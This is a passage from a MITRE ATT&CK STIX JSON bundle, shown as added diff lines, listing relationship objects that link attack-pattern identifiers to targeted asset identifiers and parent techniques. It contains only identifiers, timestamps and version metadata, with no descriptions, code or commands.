"relationship--5200b4f2-0ffb-487f-9833-6352ff5a5ee7", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5201c576-70a5-4b32-8dfd-dd8ac86f096c", + "created": "2023-09-29T16:40:18.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:40:18.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--520bcfd8-a066-48bd-b731-4a7a28e613e8", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5210c8b8-f451-4cfe-b436-3972bd2073f3", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--521519d7-94d1-40f4-962b-56a7e906b046", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5221fc94-cddd-416a-b027-67bc7a68ced1", + "created": "2020-10-01T00:48:09.642Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--523777f8-4780-4716-807c-08a67450b916", + "created": "2023-09-29T18:45:13.052Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:13.052Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--523934ff-b167-4212-bbfb-444fc62c7577", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--523c42cb-2e30-4a5f-9270-14dc0db7d17c", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--523eea2a-cd20-445b-b5f5-d9c2ef96b933", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--524c46b4-9dbe-4697-98dd-e1fedf6e0264", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--524ffb0f-40ae-4c97-a098-d14001fffa31", + "created": "2023-09-29T16:44:54.473Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:44:54.473Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52578b19-1c36-4301-b841-ab6eb72d0367", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--525d0a51-bbf9-4cda-aec9-562bb05bd3a0", + "created": "2024-04-09T20:58:49.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:58:49.397Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52739ae0-f6db-4965-b95a-c22e8ec3652d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52788a88-8304-4587-9d39-c0999e307681", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5284de62-fff8-4c01-a015-bfe68d3d6513", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--529b0bf7-66f3-47f1-893b-4daa157f7760", + "created": "2020-02-21T21:15:33.353Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52bfd00c-2e5b-4e43-bba6-f3b46e241d7b", + "created": "2023-09-28T21:23:26.598Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:23:26.598Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52c9bd84-77bf-430d-b52b-05b5f6532297", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52ca3d85-35b0-449a-ba11-b1f3e86d1992", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52cfec4e-9a4f-47b4-ba8a-fc95e034ac1e", + "created": "2020-02-18T16:56:57.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", + "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52dda51b-64b9-40b3-ac2a-18a0bc4a1436", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52e6dc3b-2ebf-4077-8efb-db2e10a3ec24", + "created": "2024-06-27T08:59:12.858Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:59:12.858Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52e828db-58d0-443e-8d94-54d265d9606e", + "created": "2023-09-29T17:42:01.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:42:01.044Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52f00fab-219d-4960-a105-7bf8bdb169a8", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52f3e7d0-825b-43b3-b564-b187ee8c5bf9", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--52fbc6b4-e16e-44c5-9aae-cc2fe4b9b989", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--530e5926-1093-402d-827b-46a7fd7bce95", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53265ebb-d911-483a-96af-0b0478c87b55", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53358ca1-47a5-47b2-9325-198ac0c21638", + "created": "2024-06-26T15:37:05.756Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:37:05.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53456fd2-4e7f-40e9-97ea-f50073e3cda3", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53644e4f-fa32-45eb-a43b-0d37c06369b7", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5366199a-400d-49de-96fb-ea393d5f770a", + "created": "2020-03-02T20:08:03.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--537481f5-c4d1-4a4b-a16e-cbd9ad8f6651", + "created": "2024-06-26T14:49:17.441Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:49:17.441Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5377e0c5-d468-4a1f-9972-f4acbbf86e75", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--537bf9b2-6721-4548-a2a3-39c528d0bf1a", + "created": "2024-06-26T11:54:06.579Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:54:06.579Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5393f32f-61e0-43d6-b112-a90e67563ac0", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--53a7d9cb-d6d9-41fe-9e24-7a7130013141", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + 